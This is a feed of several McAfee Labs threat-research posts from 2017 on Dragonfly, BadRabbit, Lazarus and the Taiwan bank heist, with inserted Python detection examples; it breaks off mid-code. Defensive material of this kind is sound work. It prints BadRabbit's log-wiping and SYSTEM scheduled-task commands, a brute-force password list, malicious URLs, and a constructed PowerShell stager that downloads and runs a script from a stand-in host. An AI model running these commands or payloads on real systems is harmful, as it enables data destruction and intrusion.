Operation Dragonfly Analysis Suggests Links to Earlier Attacks https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-dragonfly-analysis-suggests-links-to-earlier-attacks/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-dragonfly-analysis-suggests-links-to-earlier-attacks/#respond Mon, 18 Dec 2017 05:03:12 +0000 https://securingtomorrow.mcafee.com/?p=83197 On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014. Moving beyond our 2014 analysis of Dragonfly, our current focus looks at the attack’s indicators to determine whether we can glean any […]

The post Operation Dragonfly Analysis Suggests Links to Earlier Attacks appeared first on McAfee Blogs.

On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014.

Moving beyond our 2014 analysis of Dragonfly, our current focus looks at the attack’s indicators to determine whether we can glean any further information regarding the source and possible motivations of those behind the campaign. The campaign targets energy companies around the world by leveraging spear-phishing emails that, once successful, allow the attackers to download Trojan software. The Trojans provide access to the victims’ systems and networks.

Going Beyond Energy

Although initial reports showed Dragonfly attacks targeting the energy sector, investigations by McAfee Labs and the Advanced Threat Research team uncovered related attacks targeting the pharmaceutical, financial, and accounting industries. Everything about this campaign points to a well-prepared assault that carefully considers each target, and conducts reconnaissance before taking any measures to exploit compromised targets.

We saw the group use several techniques to get a foothold in victims’ networks, including spear phishing, watering holes, and supply-chain compromises carried over from previous campaigns. By trojanizing well-established, legitimate software and embedding “backdoor” malware in it, the attackers let victims believe they are installing software from a trusted vendor, unaware of the supply-side compromise.

Once the attackers have a foothold, they create new user accounts or take over existing ones in order to operate stealthily. Using the remote desktop protocol to hop among internal or external systems, they connect either to a control server, if the risk is minimal, or to an internal compromised server from which they conduct operations.

The last wave of attacks used several backdoors and utilities. In analyzing the samples, we compared these with McAfee’s threat intelligence knowledge base of attack artifacts.

One of the starting points was a Trojan in the 2017 campaign with the following hashes:

  • MD5: da9d8c78efe0c6c8be70e6b857400fb1
  • SHA-256: fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9

Comparing this code, we discovered another sample from the group that was used in a July 2013 attack:

  • MD5: 4bfdda1a5f21d56afdc2060b9ce5a170
  • SHA-256: 07bd08b07de611b2940e886f453872aa8d9b01f9d3c61d872d6cfe8cde3b50d4
  • Filename: fl.exe

The file was downloaded after a Java exploit executed on the victim’s machine, according to the 2013 attack report. After analyzing the 2013 sample, we noticed that some of the executable’s resources were in Russian.

Comparing the code, we find that the 2017 sample shares a large percentage of its code with the backdoor used in the 2013 attacks. Further, some code in the 2017 backdoor is identical to code in TeamViewer, a legitimate remote administration tool used by many around the world. By incorporating that code and executing it in memory, the attackers avoid detection and leave no trace on disk.

The correlating hash we discovered that contained the same TeamViewer code was reported by Crysys, a Hungarian security company. Their report on “TeamSpy” mentions the hash we correlated: 708ceccae2c27e32637fd29451aef4a5. That sample carried the following compile date: 2011:09:07 09:27:58+01:00.

The TeamSpy attacks were originally aimed at political and human rights activists living in the Commonwealth of Independent States (the former Soviet Union) and eastern European countries. Although the report attributes the attacks to its own threat actor or actors on the basis of shared tactics and procedures, the motivations behind TeamSpy appear similar to those of the Dragonfly group. Given the identical code reuse, could the TeamSpy campaign be the work of Dragonfly?

But that’s not all of interest. We also discovered that the 2017 sample contained code blocks associated with another interesting malware family: BlackEnergy. Let’s look at an example of the code similarities we discovered:

A BlackEnergy sample from 2016 (at left) alongside a Dragonfly sample from 2017.

Self-deleting code is very common in malware, but it is usually implemented by writing a batch file and executing that, rather than by calling the delete command directly as both of these samples do.

The BlackEnergy sample used in our comparison was captured in Ukraine on October 31, 2015, and was mentioned in our post on the evolution of the BlackEnergy Trojan. It is remarkable that this piece of code is almost identical in both samples, which suggests a correlation between the BlackEnergy and Dragonfly campaigns.
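
The comparisons above (2013 backdoor against the 2017 sample, and BlackEnergy against Dragonfly) rest on one idea: hash small overlapping slices of each binary's code and look for slices that recur in another sample, which is robust to the shared routine being relocated inside the binary. The Python below is an added example of that technique, not McAfee's or Intezer's comparison tooling. Both "samples" are constructed byte strings that share a single routine (a made-up prologue, import name and call sequence, not real malware bytes) surrounded by deterministic unrelated filler; the 16-byte window size is an assumption.

```python
"""Sliding-window code overlap between two binaries.

Added example, not McAfee's or Intezer's tooling. SAMPLE_2013, SAMPLE_2017 and
UNRELATED are constructed stand-ins, not the hashes' real contents.
"""
import hashlib
from typing import List, Set, Tuple

WINDOW = 16  # bytes per sliding window; an assumption, tune for real code


def _filler(mult: int, add: int, n: int) -> bytes:
    """Deterministic filler standing in for unrelated code. Windows from two
    fillers with different multipliers never coincide, so any overlap found
    below comes only from the shared routine."""
    return bytes((i * mult + add) % 256 for i in range(n))


# Constructed routine reused across samples: a prologue, an imported-function
# name and a short call sequence. Not real malware bytes.
SHARED_ROUTINE = (b"\x55\x8b\xec\x83\xec\x20\x68" + b"DeleteFileW\x00"
                  + b"\xff\x15\x00\x20\x40\x00\x85\xc0\x74\x0a\x6a\x00"
                  + b"\xff\x15\x04\x20\x40\x00\xc9\xc3")
SAMPLE_2013 = _filler(7, 3, 200) + SHARED_ROUTINE + _filler(13, 9, 100)
SAMPLE_2017 = _filler(11, 5, 120) + SHARED_ROUTINE + _filler(17, 1, 60)
UNRELATED = _filler(19, 2, 300)


def window_hashes(code: bytes, window: int = WINDOW) -> Set[str]:
    """Hash every window-byte sliding slice. Overlapping windows make the
    comparison tolerant to the routine sitting at a different offset."""
    return {hashlib.sha1(code[i:i + window]).hexdigest()
            for i in range(len(code) - window + 1)}


def shared_code_ratio(reference: bytes, sample: bytes, window: int = WINDOW) -> float:
    """Fraction of the sample's windows that also occur in the reference."""
    ref, smp = window_hashes(reference, window), window_hashes(sample, window)
    return len(ref & smp) / len(smp) if smp else 0.0


def shared_regions(reference: bytes, sample: bytes, window: int = WINDOW) -> List[Tuple[int, int]]:
    """[(start, end)] byte ranges of the sample every window of which occurs in
    the reference: the candidate reused blocks to open in a disassembler."""
    ref = window_hashes(reference, window)
    regions, start = [], None
    for i in range(len(sample) - window + 1):
        hit = hashlib.sha1(sample[i:i + window]).hexdigest() in ref
        if hit and start is None:
            start = i
        elif not hit and start is not None:
            regions.append((start, i - 1 + window))
            start = None
    if start is not None:
        regions.append((start, len(sample)))
    return regions


if __name__ == "__main__":
    print(f"2013 vs 2017 overlap: {shared_code_ratio(SAMPLE_2013, SAMPLE_2017):.1%}")
    print(f"2013 vs unrelated:    {shared_code_ratio(SAMPLE_2013, UNRELATED):.1%}")
    for s, e in shared_regions(SAMPLE_2013, SAMPLE_2017):
        print(f"shared block at sample offset {s}-{e}: {SAMPLE_2017[s:e].hex()}")
```

On real binaries, restrict the windows to the executable sections and normalise relocatable operands (absolute addresses, import thunks) before hashing, otherwise a recompiled copy of the same routine scores as unrelated.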

Actor Sophistication

Our analysis of this attack tells a story about the actors’ capability and skills. Their targeting is precise: they know whom and what to attack, and use a variety of techniques to do so. Their focus is on Windows systems, and they use well-known practices to gather information and credentials. From our research, we have seen the evolution of the code in their backdoors and the reuse of code across their campaigns.

How well do the actors cover their tracks? We conclude they are fairly sophisticated in hiding details of their attacks, and in some cases in leaving details behind to either mislead or make a statement. We rate threat actors by scoring them in different categories, of which we have mentioned a few. The Dragonfly group is in the top echelon of targeted attackers; it is critical that those in the targeted sectors be aware of them.

The Dragonfly group is most likely after intellectual property or insights into the sectors it targets, with the ability to take offensive, disruptive and destructive action, as was seen in the 2015 attack on the Ukrainian power grid involving the BlackEnergy malware family.

 

We would like to thank the team at Intezer for their assistance and support during our research.

McAfee Labs Reports All-Time Highs for Malware in Latest Count https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-reports-all-time-highs-for-malware-in-latest-count/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-labs-reports-all-time-highs-for-malware-in-latest-count/#respond Mon, 18 Dec 2017 05:01:32 +0000 https://securingtomorrow.mcafee.com/?p=82952 In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second? One major trend that continues in Q3 is the abuse of Microsoft Office–related exploits and […]

The post McAfee Labs Reports All-Time Highs for Malware in Latest Count appeared first on McAfee Blogs.

In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second?

One major trend that continued in Q3 is the abuse of Microsoft Office-related exploits and of malicious macro code that launches PowerShell to execute the payload: so-called fileless attacks.

In March, an exploit was released that took advantage of CVE-2017-0199, a vulnerability in how Microsoft Office and WordPad handle specially crafted files that could result in remote code execution. During Q3, we saw an increase in the number of crafted files that were submitted. We also noticed that many releases take advantage of a toolkit on GitHub that makes it quite easy to create a “backdoor” attack:

Another major event in Q3 was a massive spam campaign to distribute a new version of the infamous Locky ransomware “Lukitus.” Within 24 hours, more than 23 million emails were sent. Shortly after the first arrived, security company Comodo Labs discovered another campaign related to this attack that sent more than 62,000 spam emails distributing the ransomware.

Among banking Trojans, we observed the greatest activity from Trickbot. We saw several variants in which the actors added new features to their code: cryptocurrency theft, an embedded EternalBlue exploit, and new ways of delivering the malware, which primarily targets the financial sector.

Another banking Trojan family that appeared often during the quarter was Emotet. In several spam campaigns, users were asked to download a Microsoft Word document from one of several locations. Our analysis of the attached document found the payload hidden in macros that used PowerShell to install the Trojan.
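
The macro-to-PowerShell chain described above and in the fileless-attack trend at the top of this post leaves a very consistent trace: an Office process as the parent of a script host, often with an -EncodedCommand (base64 of UTF-16LE) on the command line. The Python below is an added example, not a McAfee product rule: it walks process-creation records, keeps only script hosts spawned by Office applications, decodes any encoded command and tags common stager markers. The four events are constructed tab-separated lines (parent image, child image, command line) mimicking a Sysmon or EDR record; that layout, the application lists and the marker list are assumptions.

```python
"""Triage process-creation events for Office-spawned script hosts.

Added example, not a McAfee detection rule. SAMPLE_EVENTS are constructed
records in an assumed "parent<TAB>child<TAB>command line" layout.
"""
import base64
import re
from typing import List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Strings that typically appear in macro-to-PowerShell stagers (assumption)
STAGER_MARKERS = ("downloadstring", "downloadfile", "iex", "invoke-expression",
                  "-nop", "hidden", "bypass", "frombase64string")

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Constructed payload of the kind an Emotet-style macro hands to PowerShell
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/inv.ps1')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()

SAMPLE_EVENTS = [  # constructed
    "C:\\Windows\\explorer.exe\tC:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\t\"WINWORD.EXE\" /n invoice.doc",
    "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tpowershell.exe -NoP -W Hidden -Enc " + _ENCODED,
    "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\tC:\\Windows\\splwow64.exe\tC:\\Windows\\splwow64.exe 12288",
    "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\tC:\\Windows\\System32\\cmd.exe\tcmd.exe /c powershell -ExecutionPolicy Bypass -File C:\\Users\\Public\\u.ps1",
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE)."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(events: List[str]) -> List[dict]:
    """One finding per script host spawned by an Office application."""
    findings = []
    for line in events:
        parent, child, cmdline = line.split("\t", 2)
        p, c = _basename(parent), _basename(child)
        if p not in OFFICE_APPS or c not in SCRIPT_HOSTS:
            continue  # e.g. Word spawning the print spooler helper is normal
        decoded = decode_encoded_command(cmdline)
        haystack = (cmdline + " " + (decoded or "")).lower()
        flags = ["encoded command"] if decoded else []
        flags += [marker for marker in STAGER_MARKERS if marker in haystack]
        findings.append({"parent": p, "child": c, "decoded": decoded, "flags": flags})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["parent"], "->", finding["child"], finding["flags"])
        if finding["decoded"]:
            print("   decoded:", finding["decoded"])
```

The parent-child pair alone is the high-value signal; the marker list only ranks findings, and an attacker can trivially avoid every string in it.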

These major campaigns and others caused a tsunami of spam email, distributing a tremendous number of samples that increased the malware storage demands of all of us in the security industry.

For more details and our usual statistics on malware, breach incidents, and web and network threats, read the McAfee Labs Threats Report, December 2017.

Lazarus Cybercrime Group Moves to Mobile Platform https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-cybercrime-group-moves-to-mobile/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-cybercrime-group-moves-to-mobile/#respond Mon, 20 Nov 2017 12:02:16 +0000 https://securingtomorrow.mcafee.com/?p=82480 When it comes to describing cyberattacks, the word sophisticated is used a lot. Whether to explain yet another “advanced” campaign by a threat actor group hoping to steal information or disrupt computer systems, it seems the precursor to any analysis is to call it sophisticated. Yet the modus operandi for many of these groups is […]

The post Lazarus Cybercrime Group Moves to Mobile Platform appeared first on McAfee Blogs.

When it comes to describing cyberattacks, the word sophisticated is used a lot. Whether to explain yet another “advanced” campaign by a threat actor group hoping to steal information or disrupt computer systems, it seems the precursor to any analysis is to call it sophisticated. Yet the modus operandi for many of these groups is to begin an attack with a simple email, which for some time has been one of the most effective malware delivery mechanisms.

The McAfee Mobile Research team has identified a new threat—Android malware that poses as a legitimate app available from Google Play and targets South Korean users—that suggests a deviation from the traditional playbook. An analysis of campaign code, infrastructure, and tactics and procedures suggests the Lazarus group is responsible, as they evolve their attack tactics to now operate within the mobile platform. And although the debate regarding attribution of attacks will always rage, documenting evolving tactics by threat actor groups allows organizations and consumers to adapt their defenses accordingly.

Based on what we know, the app first appeared in the wild in March 2017. Distribution is very low and is aimed at a Korean audience (based on telemetry hits).

Although we cannot be certain, persons associated with GodPeople, the Seoul-based organization that developed the original application and has a history of supporting religious groups in North Korea, could be the intended targets. GodPeople is sympathetic to individuals from North Korea, having helped to produce a movie about underground church groups in the North. Previous dealings with the Korean Information Security Agency on discoveries in the Korean peninsula have shown that religious groups are often the target of such activities in Korea.

Evolving Attack Tactics

Leveraging email as the entry vector allows attackers to be very specific about whom they wish to target, an approach often described as spear phishing. Developing a malicious application does not provide the same level of granularity. However, in this instance the attackers developed malware that poses as a legitimate APK, advertising itself as a means of reading the Bible in Korean. Leveraging the mobile platform as the attack vector is potentially significant, particularly as South Korea has a significant mobile population that is “in a race to be first with 5G,” according to a Forbes article. Typically when a mobile platform is mentioned, we think about our mobile phones. However, in this case, we know South Korea has an increasing use of tablets, replacing traditional laptops. How well secured are tablets, and how are they monitored?

Evolving attacks onto the mobile platform are likely to continue, and this appears to be the first example of the Lazarus group using mobile. Such a change, therefore, is significant, demonstrating that criminals are keeping up with platform popularity. Indeed, according to the International Telecommunication Union, the global number of mobile subscriptions worldwide now exceeds the global population, which suggests that such a tactic is only likely to increase as our dependency on mobile platforms grows.

Source: International Telecommunication Union.

Keeping Safe

Understanding the evolving tactics by nefarious actors is imperative. It is critical that we adopt simple security measures to counter these new tactics. This malware is detected as “Android/Backdoor” by McAfee Mobile Security. Always keep your mobile security application updated to the latest version. And never install applications from unverified sources.

‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/badrabbit-ransomware-burrows-russia-ukraine/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/badrabbit-ransomware-burrows-russia-ukraine/#comments Tue, 24 Oct 2017 22:31:49 +0000 https://securingtomorrow.mcafee.com/?p=81528 This post was researched and written by Christiaan Beek, Tim Hux, David Marcus, Charles McFarland, Douglas McKee, and Raj Samani. McAfee is currently investigating a ransomware campaign known as BadRabbit, which initially infected targets in Russia and the Ukraine. We are also investigating reports of infected systems in Germany, Turkey, and Bulgaria and will provide updates […]

The post ‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine appeared first on McAfee Blogs.

This post was researched and written by Christiaan Beek, Tim Hux, David Marcus, Charles McFarland, Douglas McKee, and Raj Samani.

McAfee is currently investigating a ransomware campaign known as BadRabbit, which initially infected targets in Russia and Ukraine. We are also investigating reports of infected systems in Germany, Turkey, and Bulgaria and will provide updates as more information becomes available. For McAfee product coverage, please see “How McAfee Products Can Protect Against BadRabbit Ransomware.”

When victims visit the following site, a dropper is downloaded:

hxxp://1dnscontrol[dot]com/flash_install.php

After infection, the victim sees the following screen:

The ransomware currently demands 0.05 Bitcoin; however, there is no confirmation that paying the ransom results in a decryption key being provided.

A decryption site at the following .onion (Tor) domain displays the time that victims have left before the price goes up:

caforssztxqzf2nm[dot]onion

Files with the following extensions are encrypted:

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip

The malware starts a command line with the following values:

Cmd /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1082924949 && exit"

“/TN rhaegal” sets the name of the scheduled task; “/RU SYSTEM” makes it run under the SYSTEM account and “/SC ONSTART” triggers it at every boot, when it launches the ransomware file dispci.exe. Rhaegal is likely a reference to a dragon from the popular TV show “Game of Thrones.” In fact, three dragon names (Rhaegal, Viserion, and Drogon) are used for the scheduled tasks the malware creates.

The malware then uses the following commands to clear the Windows event logs and delete the update sequence number (USN) change journal, which investigators would otherwise use to reconstruct which files were changed:

Cmd /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:

The USN change journal provides a persistent log of all changes made to files on a volume, according to the Microsoft Developer Network. As files, directories, and other NTFS objects are added, deleted, and modified, NTFS writes records into the change journal, of which there is one per volume on the computer. Each record indicates the type of change and the object changed, and new records are appended to the end of the stream.

We also found DNS queries to ACA807##.ipt.aol[dot]com, in which “##” is a two-digit hex number from 00 to FF.

We created a graph of the events occurring during an infection by one of the BadRabbit samples. The initial binary loads itself into memory and kills the initial process. Further processes drop configuration, services files, and other artifacts used in the attacks. The graph ends with the creation of the preceding scheduled tasks.
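The command lines and the DNS pattern above are the kind of telemetry a SOC can match on. The following script is an added example written for this post, not code from the original or from McAfee: it runs three checks over a few constructed process-creation and DNS events (modelled on the commands quoted above, not captured logs). It flags a schtasks invocation that uses one of the dragon task names, runs as SYSTEM at boot, or launches dispci.exe; flags wevtutil log clearing and USN journal deletion; and decodes the ipt.aol.com hostnames. That last step rests on an interpretation not stated in the post, namely that the eight hex digits encode an IPv4 address (ACA807xx is 172.168.7.xx), so treat it as an assumption.

```python
import re

# Scheduled-task names quoted in the post (Game of Thrones dragons).
DRAGON_TASKS = {"rhaegal", "viserion", "drogon"}

# Constructed sample telemetry modelled on the command lines and the DNS
# pattern quoted in the post. These are not captured logs.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": (
        'Cmd /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR '
        '"C:\\Windows\\system32\\cmd.exe /C Start \\"\\" \\"C:\\Windows\\dispci.exe\\" '
        '-id 1082924949 && exit"')},
    {"type": "process", "cmdline": (
        "Cmd /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & "
        "wevtutil cl Application & fsutil usn deletejournal /D C:")},
    # Benign-looking task for contrast: daily schedule, runs as the user.
    {"type": "process", "cmdline": (
        'schtasks /Create /SC DAILY /TN OfficeUpdate /TR "C:\\Tools\\update.exe"')},
    {"type": "dns", "query": "ACA8073F.ipt.aol.com"},
    {"type": "dns", "query": "www.example.com"},
]

SCHTASKS_RE = re.compile(r"\bschtasks\s+/create\b", re.I)
TASKNAME_RE = re.compile(r"/TN\s+\"?([^\s\"]+)", re.I)
RUNAS_RE = re.compile(r"/RU\s+(\S+)", re.I)
SCHED_RE = re.compile(r"/SC\s+(\S+)", re.I)
WEVTUTIL_CLEAR_RE = re.compile(r"\bwevtutil\s+cl\s+(\w+)", re.I)
USN_DELETE_RE = re.compile(r"\bfsutil\s+usn\s+deletejournal\b", re.I)
IPT_AOL_RE = re.compile(r"^([0-9A-F]{8})\.ipt\.aol\.com\.?$", re.I)


def check_scheduled_task(cmdline):
    """Reasons a schtasks invocation resembles the BadRabbit persistence task."""
    if not SCHTASKS_RE.search(cmdline):
        return []
    reasons = []
    tn = TASKNAME_RE.search(cmdline)
    if tn and tn.group(1).lower() in DRAGON_TASKS:
        reasons.append("task name %s is one of the BadRabbit dragon names" % tn.group(1))
    ru = RUNAS_RE.search(cmdline)
    sc = SCHED_RE.search(cmdline)
    if ru and sc and ru.group(1).upper() == "SYSTEM" and sc.group(1).upper() == "ONSTART":
        reasons.append("task runs as SYSTEM at every boot")
    if re.search(r"[\\/]dispci\.exe", cmdline, re.I):
        reasons.append("task launches dispci.exe")
    return reasons


def check_anti_forensics(cmdline):
    """Reasons a command line resembles BadRabbit's log and USN-journal wiping."""
    reasons = []
    cleared = [m.group(1) for m in WEVTUTIL_CLEAR_RE.finditer(cmdline)]
    if cleared:
        reasons.append("clears event logs: " + ", ".join(cleared))
    if USN_DELETE_RE.search(cmdline):
        reasons.append("deletes the NTFS USN change journal")
    return reasons


def decode_ipt_hostname(hostname):
    """Decode ACA807##.ipt.aol.com-style names to a dotted IP, or None.

    Interpretation added here (not stated in the post): the eight hex digits in
    these hostnames encode an IPv4 address, so ACA807xx is 172.168.7.xx."""
    m = IPT_AOL_RE.match(hostname.strip())
    if not m:
        return None
    return ".".join(str(b) for b in bytes.fromhex(m.group(1)))


def triage(events):
    """Run the checks over a list of events and return (indicator, reasons) pairs."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            reasons = check_scheduled_task(ev["cmdline"]) + check_anti_forensics(ev["cmdline"])
            if reasons:
                findings.append((ev["cmdline"][:60], reasons))
        elif ev["type"] == "dns":
            ip = decode_ipt_hostname(ev["query"])
            if ip and ip.startswith("172.168.7."):
                findings.append((ev["query"], ["ipt.aol.com lookup encoding " + ip]))
    return findings


if __name__ == "__main__":
    for indicator, reasons in triage(SAMPLE_EVENTS):
        print(indicator)
        for r in reasons:
            print("   -", r)
```

The task-name check is a campaign-specific indicator and will age quickly; the SYSTEM-at-boot and log-wiping checks describe behaviour and are the ones worth keeping in a detection rule set.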

Embedded Credentials

One of the samples (579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648) appears to contain a list of common credentials, which it uses in a brute-force attempt to gain access and create the scheduled tasks that execute the ransomware:

  • secret
  • 123321
  • zxc321
  • zxc123
  • qwerty123
  • qwerty
  • qwe321
  • qwe123
  • 111111
  • password
  • test123
  • admin123
  • Test123
  • Admin123
  • user123
  • User123
  • guest123
  • Guest123
  • administrator123
  • Administrator123
  • 1234567890
  • 123456789
  • 12345678
  • 1234567
  • 123456
  • adminTest
  • administrator
  • netguest
  • superuser
  • nasadmin
  • nasuser
  • ftpadmin
  • ftpuser
  • backup
  • operator
  • other user
  • support
  • manager
  • rdpadmin
  • rdpuser
  • user-1
  • Administrator

Game of Thrones Fans?

It is common for attackers to use pop-culture references in their attacks. These attackers seem to have an interest in “Game of Thrones,” with at least three references to the series. Viserion, Rhaegal, and Drogon are names of scheduled tasks. GrayWorm, the name of a “Game of Thrones” commander, is the product name in the binary’s EXIF data.

Detection

There are currently three samples associated with this ransomware campaign, representing the dropper and the main executable. McAfee detects all three:

  • 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
  • 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
  • 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648

 

Ransomware Decryption Framework – Now Available https://securingtomorrow.mcafee.com/business/ransomware-decryption-framework-now-available/ https://securingtomorrow.mcafee.com/business/ransomware-decryption-framework-now-available/#respond Thu, 19 Oct 2017 16:04:38 +0000 https://securingtomorrow.mcafee.com/?p=80675 This blog details the availability of the McAfee Ransomware Recover (Mr 2).  We would like to credit Kunal Mehta and Charles McFarland in the work required to develop this framework. How do I get my files back?  This is probably the first question asked when ransomware strikes. Of course, the answer will depend on whether there […]

The post Ransomware Decryption Framework – Now Available appeared first on McAfee Blogs.

This blog details the availability of McAfee Ransomware Recover (Mr 2). We would like to credit Kunal Mehta and Charles McFarland for the work required to develop this framework.

How do I get my files back? This is probably the first question asked when ransomware strikes. The answer, of course, depends on whether a backup is available, or whether a decryption tool exists on the www.nomoreransom.org website.

Developing these tools invariably involves significant effort: not only to identify the decryption keys, but also to create a tool that can be tested, hosted and then made freely available to help victims of ransomware. Today, however, we are pleased to announce the availability of McAfee Ransomware Recover (Mr 2). This framework allows for the rapid incorporation of decryption keys and custom decryption logic (when they become available) and gets help to victims of ransomware a lot quicker.

Now, whilst the availability of a framework is important, it is probably not something you would say deserves the fanfare of the communications we have produced. The key difference here, however, is that this framework is free for the security community to use. So if security researchers have identified decryption keys and custom decryption logic for a ransomware variant, and do not want to spend the time producing their own tool, McAfee Ransomware Recover (Mr 2) is available to them free of charge.

Over the course of the next few weeks we will produce more guidance on the tool, including webcasts by the development team. Also, we will remain committed to working with our public and private sector partners to get our hands on as many decryption keys as possible.

Follow us on Twitter for all updates from #MPOWER17 at @McAfee.

Taiwan Bank Heist and the Role of Pseudo Ransomware https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/taiwan-bank-heist-role-pseudo-ransomware/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/taiwan-bank-heist-role-pseudo-ransomware/#respond Thu, 12 Oct 2017 21:34:23 +0000 https://securingtomorrow.mcafee.com/?p=80061 Widespread reports claim the Far Eastern International Bank in Taiwan has become a victim of hacking. The attacks demonstrate the global nature of cybercrime, with the cybercriminals attempting to wire US$60 million to destinations such as Sri Lanka, Cambodia, and the United States.

The post Taiwan Bank Heist and the Role of Pseudo Ransomware appeared first on McAfee Blogs.

Widespread reports claim the Far Eastern International Bank in Taiwan has become a victim of hacking. The attacks demonstrate the global nature of cybercrime, with the cybercriminals attempting to wire US$60 million to destinations such as Sri Lanka, Cambodia, and the United States. Recent reports from Sri Lanka say that two individuals have been arrested for suspected money laundering after a tip-off from the Bank of Ceylon, which reported a suspicious transfer of $1.2 million from the Far Eastern International Bank.

On Saturday October 7, Far Eastern International Bank reported that it had recovered most of the money and that overall losses could reach $500,000.

How did the attack happen?

Based on the initial intelligence we have received, the first direct interaction with the victim began with spear phishing attacks that contained “backdoor” attachments.

Figures 1 and 2 provide some examples of the attachments.

Figure 1: Spear phishing attachment.

Figure 2: Spear phishing attachment.

When the victim clicks on the link, they are redirected to a malicious site that downloads additional files to the victim’s computer. One example of these malicious sites is hxxps://jobsbankbd.com/maliciousfilename.exe.

This site hosts another backdoor that gives the criminals access to the victim’s system in the bank.

Once the criminals gained access to the systems, our initial analysis reveals that they harvested credentials. This was confirmed by evidence we found in a sample that contained the following credentials from the bank:

  • FEIB\SPUSER14
  • FEIB\scomadmin

These credentials are used to create a scheduled task on the system and to monitor the running endpoint security services. (This does not indicate a problem with the security software, only that the attackers did their research and took measures to take out the security software running within the bank.) We have notified the security provider and provided all of our research to date.

Besides the scheduled task and credentials, we discovered another interesting piece of code. Inside the sample was a resource named “IMAGE,” which turned out to be a zip file. Once extracted, we found the file aa.txt. Although this appeared to be a text file, it was really an executable.

The file contains code that checks the installed language identifiers, specifically:

  • 419 (Russian)
  • 422 (Ukrainian)
  • 423 (Belarusian)

If any of these languages is detected, the file will not run. We have seen this behavior before in ransomware families.
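The “IMAGE” resource step above, a zip whose member aa.txt is really an executable, is a good reminder never to trust a file extension during triage. The script below is an added example written for this post, not McAfee's tooling or the sample's code: it builds a constructed stand-in for the resource (a zip containing a minimal PE-shaped aa.txt that carries the HERMES marker string quoted above; no real sample is involved), then classifies each member by magic bytes, reads the PE Machine field through e_lfanew, and reports the extension mismatch and any marker strings found.

```python
import io
import struct
import zipfile

# File-type magic. The analysis in the post hinged on aa.txt really being a PE file.
MAGIC = {
    b"MZ": "pe",
    b"PK\x03\x04": "zip",
    b"%PDF": "pdf",
    b"\x7fELF": "elf",
}

# Strings the post quotes from the embedded executable.
MARKERS = [b"HERMES 2.1 TEST BUILD, press ok", b"HERMES"]


def build_fake_resource():
    """Constructed stand-in for the IMAGE resource: a zip whose only member,
    aa.txt, is a minimal PE-shaped blob. Not a real sample."""
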